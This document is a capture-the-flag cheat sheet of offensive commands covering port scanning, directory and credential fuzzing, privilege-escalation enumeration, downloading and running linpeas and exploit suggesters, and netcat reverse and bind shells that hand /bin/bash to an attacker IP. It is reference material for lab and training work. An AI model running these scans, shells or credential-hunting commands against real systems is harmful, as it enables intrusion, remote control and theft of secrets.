CTF

outside

ping

ping -c 10 $(target) | tee ping.txt

curl

curl --head $(target)

nmap

nmap -p- -oA nmap_fast $(target)
nmap -p- -sV -sC -oA nmap_full $(target)

enum4linux

enum4linux $(target)

feroxbuster

feroxbuster --url http://$(target)/ -o feroxbuster_80.txt -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

gobuster

gobuster dir --url $(target) --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

autorecon

autorecon 10.10.99.99

wfuzz

# === fuzz directories
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 404  "$URL/FUZZ"
# === fuzz files
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404  "$URL/FUZZ"
# === fuzz parameters
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 302,404 "$URL?FUZZ"
# === fuzz users
wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --hc 404,403  "$URL?user=FUZZ"

FFUF GET & POST

ffuf -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -X POST -d '{"key":"value"}' -u http://$(target):8081/api/FUZZ -fw 2

inside

sudo -l

sudo -l

cron

cat /etc/crontab
# - check scripts that are executed as root - can you edit them
# - check PATH, can you create script that will be executed instead of intended one ? 

find

find <directory-location> -user <username> -name <file-name>
find <directory-location> -group <group-name> -name <file-name>
find <directory-location> -executable -group <group-name>

linpeas.sh

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinEnum.sh

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

lse.sh

wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh
chmod +x lse.sh
./lse.sh

linux exploit suggester 2

wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
chmod +x linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl

python local server

python3 -m http.server

scp

scp -i id_rsa /home/kali/workspace/exploit/45010 barry@10.10.230.234:/home/barry/

spawning shells

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg

netcat nc shell

ATTACKER: netcat -lvnp 4444
TARGET: netcat 10.18.9.175 4444 -e /bin/bash
-- 
TARGET: netcat -lvp 4444 -e /bin/bash
ATTACKER: netcat 10.10.161.83 4444

SUID, SGID and Sticky Bits

find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

History

history
cat ~/.bash_history | less
cat ~/.mysql_history | less
cat ~/.nano_history | less
cat ~/.*history | less

links

• https://gchq.github.io/CyberChef/
• https://www.guballa.de/vigenere-solver
• https://copy.sh/brainfuck/
• https://crackstation.net/
• https://hashes.com/en/decrypt/hash
• https://chmod-calculator.com/
• https://gtfobins.github.io/
• https://github.com/tomnomnom/assetfinder
• https://github.com/tomnomnom/httprobe
• https://github.com/tomnomnom/waybackurls